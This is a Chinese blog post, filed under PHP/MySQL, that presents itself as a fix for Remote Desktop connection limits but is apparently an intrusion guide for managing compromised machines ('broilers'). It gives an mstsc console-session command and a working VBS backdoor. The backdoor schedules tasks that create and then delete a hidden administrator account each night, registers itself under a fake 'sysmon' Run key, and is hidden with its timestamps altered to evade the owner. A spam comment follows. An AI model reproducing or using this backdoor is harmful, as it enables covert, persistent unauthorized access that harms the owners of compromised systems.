您现在的位置: 首页php+mysql>正文
“3389终端连接-超出终端连接数怎么办”的解决方法
2011年01月10日 php+mysql 评论数 1

mstsc /v:肉鸡IP地址:3389 /console

通过以上命令连接过去,不管有多少人登录,都能登录上去,实乃居家旅行,杀人放火必备武器呐...

解释下:加上console命令,跟不加的区别,直接通过3389终端连接器连接的话,也就是虚拟一个桌面,你所有的操作都是独立的,也就是独立的用户,独立的进程,独立的桌面;

而加上console的话,连接上去登录进去就是主机本地的界面,也就是说,你现在看到的东西跟管理员在当地管理远程服务器是一样一样的,而一旦管理员登录上线,你的账户就会立马被锁定,而他能看到你的所有操作!!!(你们操作的是同一个桌面,就像“抢鼠标”一样,刺激吧)

一点小tips,入侵后该如何管理肉鸡呢?直接添加一个账户肯定不行,上传一个后门吧,现在的杀毒软件已经很成熟了...看看下面这个方法,也许能用上呢...

在windows目录下新建一个后缀为VBS的文件,写入以下内容:

dim wsh
set wsh=createobject("wscript.shell")
wsh.run "at 01:02 net user matrix 123456 /add",0 建立计划任务,每天凌晨1:00添加一个系统账户
wsh.run "at 01:03 net localgroup administrators matrix /add",0 加入管理员组
wsh.run "at 02:00 net user matrix /del",0 在凌晨2点把新建的账户自动删除掉,免得被管理员发现(这样一来,你只需要每天凌晨准时管理肉鸡就好了,管理员也不会发现任何痕迹,爽吧,和谐和谐...)

然后保存,在运行里输入regedit打开注册表编辑器,找到以下键值,

hkey_local_machine\software\microsoft\windows\CurrentVersion\run 新增加一个sysmon键值,输入内容为:c:\windows\sysmon.vbs

这名字够逼真吧,一般人能猜到这是后门么?哈哈

然后把sysmon.vbs设置属性为隐藏,再把文件时间修改成系统目录一致。

注意:这时检查下系统的task schedule服务是否开启,因为运行at命令需要使用到该服务。

目前有 1 条留言 其中:访客:1 条, 博主:0 条

  1. 钻石介绍 : 2011年02月28日15:55:44  -29楼 @回复 回复

    你好,初次访问贵站,真不错,我会常来的,也欢迎回访 http://www.dia-me.com。

给我留言